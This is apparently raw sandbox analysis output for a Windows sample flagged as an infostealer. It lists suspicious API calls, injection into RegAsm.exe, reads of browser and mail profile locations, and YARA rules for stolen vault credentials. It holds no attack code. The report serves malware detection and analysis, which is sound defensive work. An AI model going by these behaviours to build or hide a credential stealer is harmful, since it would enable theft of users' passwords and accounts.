Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004414AB NtDelayExecution,	1_2_004414AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0044395C NtAllocateVirtualMemory,	1_2_0044395C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00441608 NtCreateThreadEx,	1_2_00441608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0044436E NtAllocateVirtualMemory,	1_2_0044436E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_004443CE NtProtectVirtualMemory,	1_2_004443CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0044189B NtDelayExecution,	1_2_0044189B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00441E22 NtDelayExecution,	1_2_00441E22

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010FC52C	1_2_010FC52C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010FDBE0	1_2_010FDBE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010F4AA0	1_2_010F4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010F3E88	1_2_010F3E88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010F41D0	1_2_010F41D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010FE4BD	1_2_010FE4BD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_05975D50	1_2_05975D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0597A150	1_2_0597A150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0597E0E8	1_2_0597E0E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_05979208	1_2_05979208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_059745C0	1_2_059745C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_05973560	1_2_05973560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_05973CC0	1_2_05973CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_05975670	1_2_05975670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_05970308	1_2_05970308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0597C370	1_2_0597C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_067FA198	1_2_067FA198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_067FBC48	1_2_067FBC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010FDF88	1_2_010FDF88

Source: VYLigyTDuW.exe

Static PE information: invalid certificate

Source: VYLigyTDuW.exe, 00000000.00000003.1704541031.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
Source: VYLigyTDuW.exe, 00000000.00000002.1705983988.00000000005CD000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameacvm7qw909e.exe vs VYLigyTDuW.exe
Source: VYLigyTDuW.exe, 00000000.00000003.1704627717.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
Source: VYLigyTDuW.exe, 00000000.00000002.1706415121.00000000023A2000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
Source: VYLigyTDuW.exe, 00000000.00000003.1698582949.00000000040B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
Source: VYLigyTDuW.exe, 00000000.00000003.1698333641.00000000006B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
Source: VYLigyTDuW.exe, 00000000.00000003.1698654961.00000000006D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs VYLigyTDuW.exe
Source: VYLigyTDuW.exe	Binary or memory string: OriginalFilenameacvm7qw909e.exe vs VYLigyTDuW.exe

Source: VYLigyTDuW.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.3.VYLigyTDuW.exe.6d1a10.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.3.VYLigyTDuW.exe.6d1a04.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.3.VYLigyTDuW.exe.6d1a10.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.3.VYLigyTDuW.exe.6d1a04.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.3.VYLigyTDuW.exe.6d1a10.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.3.VYLigyTDuW.exe.6d1a10.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.3.VYLigyTDuW.exe.6d1a10.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.3.VYLigyTDuW.exe.6d1a10.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.VYLigyTDuW.exe.23a0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@3/1@1/2

Source: C:\Users\user\Desktop\VYLigyTDuW.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Mutant created: NULL

Source: VYLigyTDuW.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\VYLigyTDuW.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: VYLigyTDuW.exe	Virustotal: Detection: 84%
Source: VYLigyTDuW.exe	ReversingLabs: Detection: 87%

Source: unknown	Process created: C:\Users\user\Desktop\VYLigyTDuW.exe "C:\Users\user\Desktop\VYLigyTDuW.exe"
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: msvbvm60.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: vb6zz.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: vb6de.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: vb6de.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\VYLigyTDuW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0BE35204-8F91-11CE-9DE3-00AA004BB851}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: VYLigyTDuW.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: VYLigyTDuW.exe

Static file information: File size 1956616 > 1048576

Source: VYLigyTDuW.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1c8000

Source: VYLigyTDuW.exe

Static PE information: real checksum: 0x1decde should be: 0x1df9f2

Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_004011ED push ss; retn 0054h	0_2_00401249
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_00409313 push esp; ret	0_2_00409315
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_0068F800 push esp; ret	0_2_0068F9E2
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_0068F9E3 push esp; iretd	0_2_0068FA42
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A1610 push ebp; ret	0_2_022A1611
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A3C0E push ss; ret	0_2_022A3C0F
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Code function: 0_2_022A055A pushad ; retf	0_2_022A055B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_00440850 push ss; ret	1_2_00440851
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010F0C45 push ebx; retf	1_2_010F0C52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010F0C53 push ebx; retf	1_2_010F0C52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_010F0C6D push edi; retf	1_2_010F0C7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_067FFAF3 push es; ret	1_2_067FFAF4

Source: VYLigyTDuW.exe

Static PE information: section name: .text entropy: 6.83339217870378

Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VYLigyTDuW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
